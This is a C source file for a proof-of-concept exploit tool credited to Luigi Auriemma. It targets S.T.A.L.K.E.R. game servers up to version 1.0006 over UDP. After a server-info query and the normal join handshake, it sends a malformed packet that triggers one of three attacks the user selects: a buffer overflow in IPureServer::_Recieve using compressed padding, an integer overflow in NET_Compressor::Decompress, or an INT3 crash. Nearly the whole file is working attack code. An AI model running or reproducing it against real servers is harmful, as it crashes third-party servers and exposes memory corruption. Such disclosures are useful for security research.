/*
    Copyright 2008 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include <lzo/lzo1x.h>  // http://www.oberhumer.com/opensource/lzo/
#include "stalker_lzo_dict.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      1472
#define PORT        5445
#define BOFSZ       0x4000  // max 0x8000
#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00"                    "\xff\x00\x00" "\x00"
#define GS3_QUERY   "\xfe\xfd\x09" "\x00\x00\x00\x00"
#define GS3_QUERYX  "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00"



int build_bof(u8 *buff);
u32 stalker_info(u8 *buff, struct sockaddr_in *peer);
int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int putcc(u8 *dst, int chr, int len);
int putws(u8 *dst, u8 *src);
int fgetz(FILE *fd, u8 *data, int size);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u32     res,
            crc,
            ver,
            seed;
    int     sd,
            i,
            len,
            pwdlen,
            nicklen,
            pck,
            attack;
    u16     port        = PORT;
    u8      buff[BUFFSZ],
            nick[64],
            pwd[64]     = "",
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "S.T.A.L.K.E.R. <= 1.0006 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = IPureServer::_Recieve buffer-overflow\n"
            " 2 = NET_Compressor::Decompress integer overflow\n"
            " 3 = MultipacketReciever::RecievePacket INT3\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    ver = stalker_info(buff, &peer);
    if(!ver) ver = 0x00010006;
    printf("\n- use version %08x\n", ver);
    seed = time(NULL);

    do {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        seed = (seed * 0x343FD) + 0x269EC3;

        for(pck = 0; pck <= 4; pck++) {
            p = buff;
            switch(pck) {
                case 0: {
                    *p++ = 0x88;
                    *p++ = 0x01;
                    *p++ = 0x00;
                    *p++ = 0x00;
                    p += putxx(p, ver,        32);
                    p += putxx(p, seed,       32);
                    p += putxx(p, seed,       32);  // should be a different number
                    break;
                }
                case 1: {
                    *p++ = 0x80;
                    *p++ = 0x02;
                    *p++ = 0x01;
                    *p++ = 0x00;
                    p += putxx(p, ver,        32);
                    p += putxx(p, seed,       32);
                    p += putxx(p, seed,       32);  // should be a different number
                    break;
                }
                case 2: {
                    *p++ = 0x3f;
                    *p++ = 0x02;
                    *p++ = 0x00;
                    *p++ = 0x00;
                    p += putxx(p, seed,       32);
                    break;
                }
                case 3: {
                    sprintf(nick, "%08x", seed);

                    *p++ = 0x7f;
                    *p++ = 0x00;
                    *p++ = 0x01;
                    *p++ = 0x00;
                    p += putxx(p, 0x000000c1, 32);
                    p += putxx(p, 0x00000002, 32);
                    p += putxx(p, 0x00000007, 32);
                    p += putcc(p, 0,          0x50);// hash at 0x48 set to zeroes
                    pwdlen = putws(p, pwd);   p += pwdlen;
                    p += putcc(p, 0,          4);   // don't know
                    strncpy(p, nick, 0x80);   p += 0x80;
                    p += putxx(p, 1,          32);
                    nicklen = putws(p, nick); p += nicklen;

                    putxx(buff + 0x10, 0xe0 + pwdlen, 32);
                    putxx(buff + 0x14, nicklen, 32);
                    putxx(buff + 0x18, 0x58 + pwdlen, 32);
                    if(pwd[0]) putxx(buff + 0x20, 0x58, 32);
                    putxx(buff + 0x24, pwdlen, 32);
                    break;
                }
                case 4: {
                    *p++ = 0x7f;
                    *p++ = 0x00;
                    *p++ = 0x02;
                    *p++ = 0x02;
                    p += putxx(p, 0x000000c3, 32);
                    break;
                }
                default: break;
            }

            len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);

            if(pck == 3) {
                while(buff[0] != 0x7f) {
                    len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 1);
                }
                getxx(buff + 8, &res, 32);
                if(res == 0x80158410) {
                    printf("\n- server is protected by password, insert it: ");
                    fgetz(stdin, pwd, sizeof(pwd));
                    break;
                } else if(res == 0x80158610) {
                    printf("\n  server full ");
                    for(i = 5; i; i--) {
                        printf("%d\b", i);
                        sleep(ONESEC);
                    }
                    break;
                } else if(res == 0x80158260) {
                    printf("\nError: your IP is banned\n");
                    exit(1);
                } else if(res) {
                    printf("\nError: unknown error number (0x%08x)\n", res);
                    //exit(1);
                }
            }
        }

        if(pck > 4) {
            printf("\n- send malformed packet\n");
            p = buff;
            *p++ = 0x39;
            *p++ = 0x00;
            *p++ = 0x03;
            *p++ = 0x06;
            switch(attack) {
                case 1: {
                    len = build_bof(p + 1 + 2 + 1 + 4);
                    crc = lzo_crc32(0, p + 1 + 2 + 1 + 4, len);

                    *p++ = 0xe0;                    // 0xe0/0xe1 are ok, the others do INT3
                    p += putxx(p, BOFSZ,    16);    // data length
                    *p++ = 0xc1;                    // 0xc1 used to specify that there is compression
                    p += putxx(p, crc,      32);    // crc32
                    p += len;
                    break;
                }
                case 2: {
                    *p++ = 0xe0;                    // 0xe0/0xe1 are ok, the others do INT3
                    p += putxx(p, 0,        16);
                                                    // integer overflow here
                    break;
                }
                case 3: {
                    *p++ = 0xff;                    // 0xe0/0xe1 are ok, the others do INT3
                    p += putxx(p, 1,        16);
                    p += putcc(p, 'A',      1);
                    break;
                }
                default: {
                    printf("\nError: wrong attack number (%d)\n", attack);
                    exit(1);
                }
            }

            send_recv(sd, buff, p - buff, NULL, 0, &peer, 1);
            send_recv(sd, buff, p - buff, NULL, 0, &peer, 1);   // to be sure that it's arrived
        }

        close(sd);
    } while(pck <= 4);

    printf("\n- done\n");
    return(0);
}



int build_bof(u8 *buff) {
    int     lzlen;
    u8      *lzmem,
            *bof;

    bof = malloc(BOFSZ);
    if(!bof) std_err();
    memset(bof, 'A', BOFSZ);

    lzmem = malloc(LZO1X_999_MEM_COMPRESS);
    if(!lzmem) std_err();

    if(lzo1x_999_compress_level(bof, BOFSZ, buff, (void *)&lzlen, lzmem, stalker_lzo_dict, sizeof(stalker_lzo_dict), NULL, 9) != LZO_E_OK) {
        printf("\n  Error: LZO compression error\n");
        exit(1);
    }

    free(bof);
    free(lzmem);
    return(lzlen);
}



u32 stalker_info(u8 *buff, struct sockaddr_in *peer) {
    u32     chall;
    int     sd,
            len,
            i,
            t,
            retport     = 0,
            retver      = 0;
    u8      gs3[32],
            *gamever    = NULL,
            *hostport   = NULL;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("\n- send info queries\n");
          send_recv(sd, GS3_QUERY, sizeof(GS3_QUERY) - 1, NULL, 0,      peer, 0);
          send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, NULL, 0,      peer, 0);
    len = send_recv(sd, NULL,      0,                     buff, BUFFSZ, peer, 0);
    if(len < 0) goto quit;
    if(len < 8) {       // more than 8
        len = send_recv(sd, NULL,  0,                     buff, BUFFSZ, peer, 0);
        if(len < 0) goto quit;
    } else {
        memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1);
        chall = atoi(buff + 5);
        gs3[7]  = chall >> 24;
        gs3[8]  = chall >> 16;
        gs3[9]  = chall >>  8;
        gs3[10] = chall;
        len = send_recv(sd, gs3, sizeof(GS3_QUERYX) - 1, buff, BUFFSZ, peer, 0);
        if(len < 0) goto quit;
    }

    printf("\n- handle reply:\n");
    gs_handle_info(buff, len, 0, '\0', 5, 0,
        "gamever",  &gamever,
        "hostport", &hostport,
        NULL,       NULL);

    if(gamever) {
        for(i = 0; gamever[i]; i++) {
            if(gamever[i] == '.') continue;
            if(sscanf(gamever + i, "%1x", &t) != 1) continue;
            retver <<= 4;
            retver |= t;
        }
    }
    if(hostport) {
        retport = atoi(hostport);
        printf("\n- set hostport %hu\n", retport);
        peer->sin_port = htons(retport);
    }

quit:
    close(sd);
    return(retver);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 1)) break;
        }
    } else {
        if(timeout(sd, 2) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-1);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int putcc(u8 *dst, int chr, int len) {
    memset(dst, chr, len);
    return(len);
}



int putws(u8 *dst, u8 *src) {
    u8      *d,
            *s;

    if(!src[0]) return(0);  // as required by stalker
    for(s = src, d = dst; ; s++) {
        *d++ = *s;
        *d++ = 0;
        if(!*s) break;
    }
    return(d - dst);
}



int fgetz(FILE *fd, u8 *data, int size) {
    u8     *p;

    if(!fgets(data, size, fd)) return(-1);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
    return(p - data);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


